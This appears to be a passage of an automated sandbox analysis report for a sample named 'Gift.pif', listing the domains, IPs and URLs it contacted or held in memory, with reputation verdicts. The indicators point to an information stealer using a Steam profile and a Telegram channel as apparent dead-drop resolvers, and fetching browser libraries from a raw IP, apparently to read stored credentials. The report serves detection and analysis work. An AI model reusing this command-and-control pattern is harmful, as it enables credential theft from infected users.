                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259E0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		104.102.49.249
                        		truefalse
                          		unknown
                          arpdabl.zapto.org
                          		38.180.132.96
                          		truefalse
                            		unknown
                            KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://188.245.87.202/msvcp140.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/false
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/softokn3.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/vcruntime140.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199747278259false
                              • Avira URL Cloud: malware
                              		unknown
                              https://188.245.87.202/mozglue.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/nss3.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/freebl3.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/sqls.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://arpdabl.zapto.org/false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&aGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabDHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.cGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=DbzyGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=DHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/?subsection=broadcastsGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://arpdabl.zapto.org/THGift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://store.steampowered.com/subscriber_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://arpdabl.FCBFIEGCAEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/vcruntime140.dll1JGift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.autoitscript.com/autoit3/lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://arpdabl.zapto.GCAEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.valvesoftware.com/legal.htmGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199747278259/badgesGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=enGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202KJDGift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/Jlem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000000.2069414252.0000000000399000.00000002.00000001.01000000.00000006.sdmp, Gift.pif.2.dr, Automobile.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mozilla.com/en-US/blocklist/Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://arpdabl.zaptoEGCAEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://mozilla.org0/Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://t.me/armad2aGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://store.steampowered.com/privacy_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/points/shop/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nsis.sf.net/NSIS_ErrorErrorlem.exefalse
                              • URL Reputation: safe
                              		unknown
                              https://www.ecosia.org/newtab/DHCBGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFBAAAK.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/privacy_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLFBAAAK.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://arpdabl.zapto.orgGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refGift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/about/76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/my/wishlist/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://t.me/armad2ahellosqls.dllsqlite3.dllInGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/V;Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://help.steampowered.com/en/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/market/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/news/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiAFHDGD.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&amp;l=eGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DHCBGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://store.steampowered.com/subscriber_agreement/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199747278259/inventory/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://188.245.87.202/nss3.dllGGift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://arpdabl.zaptoGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.202/_;Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://188.245.87.20276561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/discussions/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/stats/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/steam_refunds/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDHCBGD.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://store.steampowered.com/privacy_agreemenGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/workshop/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/legal/Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContGift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sqlite.org/copyright.html.Gift.pif, 0000000B.00000002.3222741041.000000000C23D000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoDHCBGD.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
